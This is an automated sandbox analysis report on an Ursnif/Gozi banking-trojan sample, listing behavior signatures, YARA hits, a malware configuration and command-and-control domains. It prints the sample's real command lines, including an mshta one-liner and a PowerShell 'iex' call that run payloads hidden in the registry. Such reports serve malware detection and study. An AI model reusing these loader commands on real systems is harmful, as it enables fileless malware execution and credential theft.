Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5909
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2744
Found large amount of non-executed APIsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 8.5 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5692Thread sleep time: -922337203685477s >= -30000s
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0506CDF2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_0506CDF2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0507940E RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_0507940E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05068181 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_05068181
Contains functionality to query local drivesShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05077CDC wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,3_2_05077CDC
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72721C57 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,3_2_72721C57
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05076450 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,3_2_05076450
Contains functionality to read the PEBShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_7273C590 mov eax, dword ptr fs:[00000030h]3_2_7273C590
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_7273C0D0 push dword ptr fs:[00000030h]3_2_7273C0D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_7273C4C6 mov eax, dword ptr fs:[00000030h]3_2_7273C4C6
Contains functionality to register its own exception handlerShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_7272223F InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,3_2_7272223F
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0506C0D6 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,LdrInitializeThunk,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,3_2_0506C0D6

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: PGpPBocoGo.txt.0.drJump to dropped file
Allocates memory in foreign processesShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\System32\control.exe base: 6F0000 protect: page execute and read and writeJump to behavior
Maps a DLL or memory area into another processShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeThread register set: target process: 5160Jump to behavior
Writes to foreign memory regionsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: 6F0000Jump to behavior
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\PGpPBocoGo.txtJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'Jump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: regsvr32.exe, 00000002.00000002.1491539427.0000000001210000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1494990709.00000000032C0000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: regsvr32.exe, 00000002.00000002.1491539427.0000000001210000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1494990709.00000000032C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000002.00000002.1491539427.0000000001210000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1494990709.00000000032C0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: regsvr32.exe, 00000002.00000002.1491539427.0000000001210000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1494990709.00000000032C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,3_2_727210EC
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0506733B cpuid 3_2_0506733B
Queries the installation date of WindowsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Contains functionality to create pipes for IPCShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05064134 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,3_2_05064134
Contains functionality to query local / system timeShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72721C57 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,3_2_72721C57
Contains functionality to query the account / user nameShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0506476B RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,3_2_0506476B
Contains functionality to query windows versionShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_727217E2 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,3_2_727217E2
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000003.00000003.1353644779.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1354092603.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1354065367.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1480556329.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1496607030.0000000005060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1353849678.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1500022737.000000000066E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1353529951.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1397537618.0000000004C9B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1353755956.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1353937634.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1354012081.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 5160, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3660, type: MEMORY

Remote Access Functionality:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000003.00000003.1353644779.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1354092603.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1354065367.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1480556329.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1496607030.0000000005060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1353849678.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1500022737.000000000066E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1353529951.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1397537618.0000000004C9B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1353755956.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1353937634.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1354012081.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 5160, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3660, type: MEMORY

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "404", "system": "96ab1502108db75b005f32e9fdb6fa37hh", "size": "200780", "crc": "2", "action": "00000000", "id": "2000", "time": "1587579570", "user": "b0e80f0d54c8a3b79c4b2eb5591a3ea3", "hash": "0x0d8e127a", "soft": "3"}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 224571 Sample: open_attach_n2k.js Startdate: 22/04/2020 Architecture: WINDOWS Score: 100 40 api10.dianer.at 2->40 44 Multi AV Scanner detection for domain / URL 2->44 46 Found malware configuration 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 8 other signatures 2->50 11 wscript.exe 3 2->11         started        15 iexplore.exe 1 421 2->15         started        signatures3 process4 file5 38 C:\Users\user\AppData\...\PGpPBocoGo.txt, PE32 11->38 dropped 60 Benign windows process drops PE files 11->60 62 JScript performs obfuscated calls to suspicious functions 11->62 17 regsvr32.exe 11->17         started        19 iexplore.exe 10 259 15->19         started        22 iexplore.exe 258 15->22         started        24 iexplore.exe 258 15->24         started        signatures6 process7 dnsIp8 26 regsvr32.exe 2 1 17->26         started        42 f1.pipen.at 47.241.106.208, 49939, 49940, 49941 unknown United States 19->42 process9 signatures10 52 Detected Gozi e-Banking trojan 26->52 54 Writes to foreign memory regions 26->54 56 Allocates memory in foreign processes 26->56 58 5 other signatures 26->58 29 mshta.exe 22 26->29         started        32 control.exe